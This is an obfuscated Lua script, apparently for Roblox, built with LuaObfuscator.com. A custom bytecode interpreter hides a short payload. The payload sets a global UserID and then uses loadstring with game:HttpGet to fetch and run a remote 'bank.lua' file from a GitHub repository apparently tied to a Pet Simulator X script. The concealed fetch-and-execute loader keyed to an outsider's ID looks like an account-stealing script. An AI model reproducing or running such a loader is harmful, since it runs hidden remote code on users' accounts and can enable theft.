--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v74=v2(v0(v20,16));if v19 then local v78=0;local v79;while true do if (v78==1) then return v79;end if (v78==0) then v79=v5(v74,v19);v19=nil;v78=1;end end else return v74;end end end);local function v21(v22,v23,v24)if v24 then local v75=(v22/((1 + (3 -2))^(v23-1)))%((1862 -(198 + 1662))^(((v24-(2 -1)) -(v23-(1 + 0))) + 1 + 0 + 0)) ;return v75-(v75%(341 -(236 + 104))) ;else local v76=1487 -(1004 + 483) ;local v77;while true do if (v76==(0 + (0 -0))) then v77=2^(v23-(1 -(0 -0))) ;return (((v22%(v77 + v77))>=v77) and ((1290 -(723 + 165)) -(150 + (459 -208)))) or (1623 -(233 + (3295 -(20 + 1885)))) ;end end end end local function v25()local v38=(0 + 0) -0 ;local v39;while true do if (v38==(2 -1)) then return v39;end if (v38==(0 + 0)) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1720 -(451 + (3734 -2466)) ;end end end local function v26()local v40,v41=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v41 * (929 -673)) + v40 ;end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (223 -(144 + 76)) );v18=v18 + (7 -3) ;return (v45 * ((44594004 -27815708) -(445 + 635))) + (v44 * (66590 -(674 + (1314 -934)))) + (v43 * (246 + 10)) + v42 ;end local function v28()local v46=v27();local v47=v27();local v48=1 + 0 ;local v49=(v21(v47,1 + 0 ,1974 -(634 + 1320) ) * ((7 -(917 -(198 + 714)))^(45 -13))) + v46 ;local v50=v21(v47,1 + 20 ,(26 -17) + 22 );local v51=((v21(v47,836 -(523 + 281) )==(1502 -(166 + 1335))) and  -(1 -0)) or ((2 -1) + 0) ;if (v50==(0 + 0)) then if (v49==(0 + 0)) then return v51 * (0 -(1255 -(1040 + 215))) ;else local v80=0;while true do if (v80==(0 + 0)) then v50=1 -0 ;v48=0 -0 ;break;end end end elseif (v50==((1360 + 1888) -(364 + 837))) then return ((v49==(1511 -(750 + 761))) and (v51 * (1/(0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-(233 + 790) ) * (v48 + (v49/(((4736 -2954) -(1431 + 349))^52))) ;end local function v29(v30)local v52;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v52=v3(v16,v18,(v18 + v30) -(3 -2) );v18=v18 + v30 ;local v53={};for v66=859 -(108 + 750) , #v52 do v53[v66]=v2(v1(v3(v52,v66,v66)));end return v6(v53);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v54=879 -(273 + 606) ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if ((4 -3)~=v54) then else v57=nil;v58=nil;v54=2;end if (v54==(678 -(202 + 474))) then v59=nil;v60=nil;v54=3;end if (v54==0) then v55=0;v56=nil;v54=1;end if (v54==3) then v61=nil;v62=nil;v54=4;end if ((19 -15)~=v54) then else while true do if (v55==3) then v62=nil;while true do local v98=0 + 0 ;local v99;while true do if ((0 + 0)==v98) then v99=0 + 0 ;while true do if (0==v99) then local v106=0;while true do if (v106~=1) then else v99=1 + 0 ;break;end if (v106==0) then local v112=0;while true do if (v112~=0) then else if (v56~=(0 + 0)) then else local v137=400 -(157 + 243) ;local v138;while true do if (v137==0) then v138=0 + 0 ;while true do if (v138==1) then v59={};v56=1;break;end if (v138~=(291 -(233 + 58))) then else local v160=79 -(62 + 17) ;while true do if (v160~=0) then else v57={};v58={};v160=1516 -(653 + 862) ;end if (v160~=1) then else v138=1;break;end end end end break;end end end if ((1 + 0)==v56) then local v139=0 -0 ;local v140;local v141;while true do if (v139==0) then v140=0 + 0 ;v141=nil;v139=1;end if (v139~=1) then else while true do if (v140==(0 -0)) then v141=0;while true do if (v141~=0) then else local v173=1943 -(359 + 1584) ;while true do if (v173==(1 + 0)) then v141=1;break;end if (v173==0) then v60={v57,v58,nil,v59};v61=v27();v173=1;end end end if (v141==(1 + 0)) then v62={};v56=2;break;end end break;end end break;end end end v112=1 + 0 ;end if (1~=v112) then else v106=913 -(643 + 269) ;break;end end end end end if (v99~=(1544 -(18 + 1525))) then else if (v56==(2 + 0)) then local v107=1933 -(101 + 1832) ;local v108;local v109;while true do if (v107==(1645 -(749 + 896))) then v108=1872 -(615 + 1257) ;v109=nil;v107=1;end if (v107==(1088 -(989 + 98))) then while true do if (v108~=(0 + 0)) then else v109=0;while true do if (v109~=1) then else for v146=1,v27() do local v147=0 -0 ;local v148;local v149;local v150;local v151;while true do if (v147==(4 -2)) then while true do if (v148~=(0 + 0)) then else v149=0 + 0 ;v150=nil;v148=1;end if (1~=v148) then else v151=nil;while true do if (v149==0) then v150=0;v151=nil;v149=1;end if ((514 -(320 + 193))==v149) then while true do if (v150==(401 -(43 + 358))) then v151=v25();if (v21(v151,1,1 -0 )==0) then local v187=1231 -(361 + 870) ;local v188;local v189;local v190;local v191;local v192;while true do if (v187==0) then v188=0 + 0 ;v189=nil;v187=2 -1 ;end if (v187==(2 + 0)) then v192=nil;while true do if (v188==(1 + 0)) then v191=nil;v192=nil;v188=7 -5 ;end if (v188==2) then while true do if (v189~=1) then else local v200=0;local v201;while true do if (v200==0) then v201=1318 -(226 + 1092) ;while true do if (v201==(1 -0)) then v189=2;break;end if (v201~=(0 -0)) then else local v211=0 -0 ;while true do if (0~=v211) then else v192={v26(),v26(),nil,nil};if (v190==(0 -0)) then local v214=658 -(378 + 280) ;local v215;local v216;local v217;while true do if (1~=v214) then else v217=nil;while true do if (1==v215) then while true do if (v216==0) then v217=0;while true do if (v217~=(702 -(374 + 328))) then else v192[3]=v26();v192[29 -(15 + 10) ]=v26();break;end end break;end end break;end if (v215==(0 + 0)) then local v224=0;while true do if (v224~=1) then else v215=1;break;end if (v224~=(0 + 0)) then else v216=1231 -(1000 + 231) ;v217=nil;v224=1 -0 ;end end end end break;end if (0==v214) then v215=0;v216=nil;v214=1;end end elseif (v190==(2 -1)) then v192[1947 -(1291 + 653) ]=v27();elseif (v190==2) then v192[1113 -(1094 + 16) ]=v27() -(2^16) ;elseif (v190==(1545 -(692 + 850))) then local v225=0;local v226;local v227;while true do if (v225==1) then while true do if (v226~=(0 -0)) then else v227=0;while true do if ((0 + 0)~=v227) then else v192[3]=v27() -((1 + 1)^(764 -(444 + 304))) ;v192[1 + 3 ]=v26();break;end end break;end end break;end if (v225==(1997 -(1469 + 528))) then v226=0;v227=nil;v225=2 -1 ;end end end v211=1;end if ((1 + 0)==v211) then v201=4 -3 ;break;end end end end break;end end end if (v189~=(0 -0)) then else local v202=0;local v203;while true do if (v202~=0) then else v203=0;while true do if (v203~=(0 + 0)) then else local v212=0;while true do if (v212==(1 -0)) then v203=1 + 0 ;break;end if (v212~=0) then else v190=v21(v151,1522 -(1068 + 452) ,3);v191=v21(v151,4,1239 -(243 + 990) );v212=1 + 0 ;end end end if (v203~=1) then else v189=1;break;end end break;end end end if (v189==2) then local v204=1724 -(1645 + 79) ;local v205;local v206;while true do if (v204==1) then while true do if (v205==(0 + 0)) then v206=231 -(199 + 32) ;while true do if (v206==(1609 -(55 + 1553))) then v189=1388 -(1009 + 376) ;break;end if (v206~=0) then else local v213=0 -0 ;while true do if (v213~=(0 -0)) then else if (v21(v191,1 + 0 ,2 -1 )~=(1687 -(743 + 943))) then else v192[2]=v62[v192[2]];end if (v21(v191,1440 -(860 + 578) ,2)==1) then v192[60 -(44 + 13) ]=v62[v192[3]];end v213=1;end if (v213~=(1 + 0)) then else v206=2 -1 ;break;end end end end break;end end break;end if (0==v204) then v205=0;v206=nil;v204=1;end end end if ((450 -(282 + 165))==v189) then if (v21(v191,1127 -(1122 + 2) ,3)~=1) then else v192[4]=v62[v192[4]];end v57[v146]=v192;break;end end break;end if ((0 -0)==v188) then local v199=0;while true do if (v199~=0) then else v189=0 -0 ;v190=nil;v199=1;end if (v199==(1 + 0)) then v188=1628 -(198 + 1429) ;break;end end end end break;end if (v187==1) then v190=nil;v191=nil;v187=4 -2 ;end end end break;end end break;end end break;end end break;end if (v147==1) then v150=nil;v151=nil;v147=7 -5 ;end if (v147==0) then v148=0;v149=nil;v147=1870 -(1724 + 145) ;end end end v56=3;break;end if (v109==(0 + 0)) then local v144=0;local v145;while true do if ((0 -0)==v144) then v145=0 + 0 ;while true do if (v145==(1853 -(405 + 1448))) then local v174=0 + 0 ;while true do if (v174~=(2 -1)) then else v145=1;break;end if (v174==0) then for v176=1468 -(1420 + 47) ,v61 do local v177=0 -0 ;local v178;local v179;local v180;local v181;while true do if (2==v177) then while true do if (v178~=(0 + 0)) then else local v193=0;while true do if (v193==(630 -(385 + 245))) then local v194=1200 -(721 + 479) ;while true do if (v194~=1) then else v193=1;break;end if (v194~=0) then else v179=0 + 0 ;v180=nil;v194=1;end end end if (v193==1) then v178=1;break;end end end if (v178==(4 -3)) then v181=nil;while true do if (v179==1) then if (v180==(2 -1)) then v181=v25()~=(0 + 0) ;elseif (v180==2) then v181=v28();elseif (v180==(1 + 2)) then v181=v29();end v62[v176]=v181;break;end if (v179~=0) then else local v196=0;local v197;local v198;while true do if (v196==1) then while true do if (v197==(71 -(32 + 39))) then v198=0;while true do if (v198~=0) then else local v210=0;while true do if (v210~=(0 + 0)) then else v180=v25();v181=nil;v210=1;end if (v210==(1 + 0)) then v198=1;break;end end end if (v198==1) then v179=1;break;end end break;end end break;end if (v196==0) then v197=0 -0 ;v198=nil;v196=1 -0 ;end end end end break;end end break;end if (v177==(3 -2)) then v180=nil;v181=nil;v177=1981 -(1250 + 729) ;end if (v177==(0 + 0)) then v178=1822 -(1337 + 485) ;v179=nil;v177=1 + 0 ;end end end v60[3]=v25();v174=1 + 0 ;end end end if (1~=v145) then else v109=1 + 0 ;break;end end break;end end end end break;end end break;end end end if (v56==3) then local v110=282 -(168 + 114) ;local v111;while true do if ((711 -(62 + 649))~=v110) then else v111=335 -(149 + 186) ;while true do if (v111==1) then return v60;end if ((0 -0)==v111) then local v142=0;while true do if ((0 -0)==v142) then for v152=1,v27() do v58[v152-(1 + 0) ]=v33();end for v154=3 -2 ,v27() do v59[v154]=v27();end v142=1;end if (v142==(1 + 0)) then v111=1;break;end end end end break;end end end break;end end break;end end end break;end if (v55==1) then v58=nil;v59=nil;v55=753 -(335 + 416) ;end if (v55==0) then local v91=0;local v92;while true do if (v91==0) then v92=0;while true do if (v92==0) then v56=0;v57=nil;v92=1 + 0 ;end if (v92==1) then v55=1;break;end end break;end end end if (v55==2) then local v93=0 -0 ;while true do if (v93==(448 -(242 + 205))) then v55=1897 -(456 + 1438) ;break;end if (v93==0) then v60=nil;v61=nil;v93=1;end end end end break;end end end local function v34(v35,v36,v37)local v63=v35[1];local v64=v35[2];local v65=v35[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (1==v68) then v71={...};v72=v12("#",...) -1 ;v68=2;end if (v68==2) then v73=nil;v73=function()local v81=v63;local v82=v64;local v83=v65;local v84=v32;local v85={};local v86={};local v87={};for v94=(476 -(13 + 51)) -(161 + 251) ,v72 do if ((v94>=v83) or ((726 + 516)>(9398 -(912 + 4878)))) then v85[v94-v83 ]=v71[v94 + 1 + 0 + 0 ];else v87[v94]=v71[v94 + (1534 -(732 + 801)) ];end end local v88=(v72-v83) + (2 -1) ;local v89;local v90;while true do local v95=704 -(427 + 277) ;local v96;while true do if (((626 + 913)<(11240 -8189)) and (v95==(0 -(0 -0)))) then v96=88 -(51 + 37) ;while true do if (((3945 -(88 + 68))>(1576 + 2149)) and (v96==(3 -2))) then if (((7666 -(5010 -1323))==(9299 -5320)) and (v90<=4)) then if ((4698<=(11694 -6848)) and (v90<=(2 -1))) then if ((v90==(0 -0)) or (2015>=(5395 -(585 + 1135)))) then v87[v89[7 -5 ]]=v37[v89[1082 -(851 + 228) ]];else for v118=v89[2 -0 ],v89[1303 -(598 + 702) ] do v87[v118]=nil;end end elseif (((9986 -7736)>=(3293 -(343 + 1421))) and (v90<=(2 + 0))) then do return;end elseif (((5988 -3866)<=2344) and (v90==(2 + 1))) then local v120=0 + 0 ;local v121;local v122;local v123;local v124;while true do if (((1532 + 1625)<(5587 -(1045 + 453))) and (v120==(2 + 0))) then while true do if (((4647 -1810)==(5031 -2194)) and (v121==(0 -0))) then local v156=0 -(1874 -(149 + 1725)) ;while true do if ((v156==1) or ((6531 -4152)<(5018 -3019))) then v121=3 -2 ;break;end if (((9352 -5745)>=(1592 -(1812 -(824 + 346)))) and (v156==(0 + 0))) then v122=0 -0 ;v123=nil;v156=1 + 0 ;end end end if ((v121==(1 + 0)) or (((2634 -(57 + 245)) -(28 + 339))==(4326 -2483))) then v124=nil;while true do if ((v122==(1679 -(1442 + 236))) or ((1015 -290)>=((12027 -(75 + 1355)) -7416))) then v87[v123 + (1 -0) ]=v124;v87[v123]=v124[v89[7 -3 ]];break;end if (((1847 -(200 + 1641))<(1398 + 554)) and (v122==(953 -(655 + 298)))) then local v168=0 -0 ;local v169;while true do if (((8352 -6109)<=(9332 -4565)) and (v168==(0 -0))) then v169=0 + 0 ;while true do if (((361 + 161 + 1098)==(7680 -6060)) and (v169==((0 + 0) -0))) then local v182=0 -(0 -0) ;while true do if ((v182==(364 -(282 + 81))) or ((20022 -15131)>=(1724 + 3275))) then v169=1 + 0 + 0 ;break;end if ((v182==(890 -((2211 -(1127 + 256)) + 62))) or ((5233 -(300 + 2405))<(1070 + 292))) then v123=v89[1202 -((2360 -1600) + 440) ];v124=v87[v89[4 -1 ]];v182=1 + (440 -(268 + 172)) ;end end end if (((8412 -(3924 + 1576))<=2958) and (v169==((308 + 149) -(238 + 218)))) then v122=(2594 -(1052 + 337)) -(1158 + 46) ;break;end end break;end end end end break;end end break;end if (((2 -1)==v120) or ((1646 + 1742)>=((5571 + 5675) -6558))) then v123=nil;v124=nil;v120=6 -4 ;end if ((v120==(1741 -(930 + 811))) or ((2302 -(1279 + 484))>=(16549 -13043))) then v121=1334 -(1081 + 253) ;v122=nil;v120=4 -3 ;end end else local v125=0 -0 ;local v126;local v127;local v128;local v129;local v130;while true do if ((v125==(1 + 0)) or (((11594 -8193) -1276)>=(12844 -8258))) then v128=nil;v129=nil;v125=2 + 0 ;end if ((v125==(2 + 0)) or ((201 + 1595)==(166 + 2081))) then v130=nil;while true do if ((v126==(326 -(136 + 188))) or ((13106 -10189)<(1324 -(250 + 599)))) then for v161=v127,v70 do local v162=0 -(1435 -(1329 + 106)) ;local v163;local v164;while true do if ((v162==(0 + 0)) or ((692 + 261)>(8189 -4871))) then v163=(781 -(350 + 431)) -0 ;v164=nil;v162=1 -0 ;end if (((3566 -(426 + 1457))==((430 + 1424) -(96 + 75))) and (v162==(1 + 0))) then while true do if ((v163==(1993 -(1918 + (203 -128)))) or ((454 + 356 + 428)>((1518 + 4496) -4371))) then v164=0 + 0 ;while true do if (((4455 -(548 + 119))==((16405 -12093) -(353 + 171))) and (v164==(1488 -(653 + (2941 -2106))))) then v130=v130 + 1 + 0 ;v87[v161]=v128[v130];break;end end break;end end break;end end end break;end if (((2298 + 38)==(428 + 1908)) and (v126==(769 -(703 + 65)))) then local v157=(1550 -(78 + 1472)) + 0 ;while true do if ((v157==((374 + 1401) -(1597 + 178))) or ((4315 -(16 + 19))<=(2547 + 366))) then v70=(v129 + v127) -(3 -2) ;v130=482 -(342 + 140) ;v157=3 -2 ;end if ((v157==(3 -2)) or (1641<=(162 + 59))) then v126=7 -5 ;break;end end end if ((v126==(0 + 0)) or ((1658 + 2998)<(999 + (1604 -(640 + 627))))) then local v158=0 -(215 -(54 + 161)) ;while true do if ((v158==(0 + 0)) or ((4709 -(159 + 1569))<=(3417 -2219))) then v127=v89[4 -2 ];v128,v129=v84(v87[v127](v13(v87,v127 + (1 -0) ,v89[6 -(11 -8) ])));v158=1657 -(1351 + 305) ;end if ((v158==(1 + 0)) or ((7875 -4499)<(1198 + 132))) then v126=2 -1 ;break;end end end end break;end if ((v125==(0 + 0)) or (4975<(12071 -7388))) then v126=0;v127=nil;v125=2 -1 ;end end end elseif ((v90<=(19 -12)) or ((828 + 2410)>=(9015 -5445))) then if ((v90<=(7 -2)) or ((912 + 2082)>(10046 -5842))) then v69=v89[3 + (0 -0) ];elseif ((v90>(5 + (2 -1))) or ((1068 + 3122)==(9664 -6278))) then v87[v89[2 + (609 -(66 + 543)) ]]=v89[9 -6 ];else v87[v89[1 + 0 + 1 ]]();end elseif ((v90<=(458 -(312 + 138))) or ((3179 + 1785)<=(5515 -2607))) then v87[v89[661 -((1099 -595) + 155) ]][v89[23 -(7 + 13) ]]=v89[472 -(105 + 363) ];elseif (((4083 -1830)>(2113 -(1548 + 348))) and (v90==(3 + 6))) then if (((183 + 443)<(5980 -(1008 + 2793))) and (v87[v89[1 + 1 ]]==v89[3 + 1 ])) then v69=v69 + 1 + 0 ;else v69=v89[13 -10 ];end else local v133=0 -0 ;local v134;local v135;local v136;while true do if (((7898 -5888)<(110 + 4722)) and (v133==(1923 -(271 + 1652)))) then v134=0 -0 ;v135=nil;v133=1 -0 ;end if (((1 -0)==v133) or ((2224 + 2539)<=((4819 -(205 + 116)) -(161 + 27)))) then v136=nil;while true do if ((v134==(1656 -(986 + 669))) or ((389 + 1351)<=(6986 -5256))) then while true do if ((v135==0) or (((1966 + 3503) -(269 + 1377))==(8179 -4561))) then v136=v89[2 -0 ];v87[v136]=v87[v136](v13(v87,v136 + (605 -(304 + 300)) ,v70));break;end end break;end if ((((814 + 47) -(495 + 169))<=((7424 + 2248) -7406)) and (v134==(0 -0))) then local v159=0 + 0 ;while true do if ((v159==(1 + 0)) or ((5091 -(1716 + 105))>(11318 -(8064 -(397 + 310))))) then v134=1 + 0 ;break;end if (((3738 + 1157)>(6364 -(180 + 1720))) and (v159==(1226 -(271 + 955)))) then v135=0;v136=nil;v159=(1896 -(1054 + 841)) -0 ;end end end end break;end end end v69=v69 + (1586 -((1206 -(38 + 50)) + 467)) ;break;end if (((2859 -1817)==(639 + 403)) and (v96==(430 -(68 + 362)))) then v89=v81[v69];v90=v89[1 -0 ];v96=2 -1 ;end end break;end end end end;v68=3;end if (v68==3) then A,B=v32(v11(v73));if  not A[1] then local v97=v35[4][v69] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v68==0) then v69=1;v70= -1;v68=1;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703063O0055736572494403093O00313936313534323837030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F622O6C7869326372617A792F7363726970747073782F6D61696E2F62616E6B2E6C756100153O0012073O00014O0001000100013O0026093O0002000100010004053O00020001001207000100013O00260900010005000100010004053O0005000100122O000200023O00300800020003000400122O000200053O00122O000300063O002003000300030007001207000500084O0004000300054O000A00023O00022O00060002000100010004053O001400010004053O000500010004053O001400010004053O000200012O00023O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
